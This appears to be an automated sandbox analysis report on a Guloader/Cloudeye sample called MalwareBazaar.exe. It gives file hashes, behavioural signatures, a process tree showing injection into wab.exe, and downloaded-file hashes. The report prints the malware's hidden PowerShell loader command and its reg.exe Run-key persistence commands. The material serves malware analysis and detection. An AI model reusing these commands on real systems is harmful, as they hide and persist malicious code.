Analysis
- max time kernel: 121s
- max time network: 122s
- platform: windows7_x64
- resource: win7-20240705-en
- resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
- submitted: 09-07-2024 11:16
Static task: static1
Behavioral task: behavioral1
  Sample: MalwareBazaar.exe
  Resource: win7-20240705-en
Behavioral task: behavioral2
  Sample: MalwareBazaar.exe
  Resource: win10v2004-20240704-en
General
- Target: MalwareBazaar.exe
- Size: 401KB
- MD5: f1043033237fa935ef9af72415e657a1
- SHA1: b1ce2973b99811fe469ae6b4c450e97d4d4f4a20
- SHA256: a03913b0dcf4d9707eb9c74d69b522927e760e9be55effb0e14ebbbaad9177c7
- SHA512: 1f4971262c297f2fa58234d7787ea384a168633eadce39e9334d9e7f5e5924b40eb47b84cc83ec8c29c62212863f17340a5525007d25f721c900e5583cf8dd3b
- SSDEEP: 6144:FM23AboMfTvNXDQV1yKE2C7qNIZX8il32bcHXgjv3bO43f1WYq6cVjWZSlhhEV:nGoGNzQ+DZX8M2bc3Av3bO43tW5WZl
Malware Config
Signatures
- Guloader, Cloudeye
  A shellcode based downloader first seen in 2020.
- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run Powershell and hide display window.
- Adds Run key to start application (2 TTPs, 1 IoCs)
  Processes:
    reg.exe: Set value (str) \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\\Chet\\').Ruelike;%pantstnings% ($Uselessness)"
- Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
- Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  Processes:
    wab.exe (pid 2792), 2 occurrences
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  Processes:
    powershell.exe (pid 1620)
    wab.exe (pid 2792)
- Suspicious use of SetThreadContext (1 IoCs)
  Processes:
    powershell.exe (pid 1620) set thread context of wab.exe (pid 2792)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry key (1 TTPs, 1 IoCs)
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes:
    powershell.exe (pid 1620), 8 occurrences
- Suspicious behavior: MapViewOfSection (1 IoCs)
  Processes:
    powershell.exe (pid 1620)
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
    powershell.exe (pid 1620): Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (18 IoCs)
  Processes:
    MalwareBazaar.exe (pid 2860) wrote to memory of powershell.exe (pid 1620), 4 occurrences
    powershell.exe (pid 1620) wrote to memory of wab.exe (pid 2792), 6 occurrences
    wab.exe (pid 2792) wrote to memory of cmd.exe (pid 2724), 4 occurrences
    cmd.exe (pid 2724) wrote to memory of reg.exe (pid 2772), 4 occurrences
Processes
1. C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"
   - Suspicious use of WriteProcessMemory
   PID: 2860
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "powershell.exe" -windowstyle hidden "$Vindflj=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp';$Byggryn=$Vindflj.SubString(71093,3);.$Byggryn($Vindflj)"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 1620
      3. C:\Program Files (x86)\windows mail\wab.exe
         Command line: "C:\Program Files (x86)\windows mail\wab.exe"
         - Suspicious use of NtCreateThreadExHideFromDebugger
         - Suspicious use of NtSetInformationThreadHideFromDebugger
         - Suspicious use of WriteProcessMemory
         PID: 2792
         4. C:\Windows\SysWOW64\cmd.exe
            Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"
            - Suspicious use of WriteProcessMemory
            PID: 2724
            5. C:\Windows\SysWOW64\reg.exe
               Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"
               - Adds Run key to start application
               - Modifies registry key
               PID: 2772
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 350KB
  MD5: be381f7baf52513e52dfed9361a6dc69
  SHA1: a6cdb30ea1a85a42404e6e2fd29c8d5cc6ad251a
  SHA256: caceb5002866580c07883f8fddb62a82d7fadd1e8ca7a2eb4e11240dfda94d79
  SHA512: c076aa00785538010dcc9df6aaba0f8af5f130b7edc800fca31da4fff9ee11fa728ba5c78c89047494b0536878d8b32d3f05f43177dacf0416726b02af814c8a
- Filesize: 69KB
  MD5: 8172795f7c8cfb7cc597e879d2b0b468
  SHA1: 811797a9309a1bc3429f3bc7735eb6af1a7c80dc
  SHA256: 5339721e47b9ac3dfb81b6d81593e9792c57573541918c0d5ca327128aa4345c
  SHA512: 9718f72091367ed6a02598295a9f35512c6ddb31e3dae9b685060e613c942c755d90418cb4ea31e4bf7ea8967ce34c9356bbf53fafe08a31d851afddd55d7322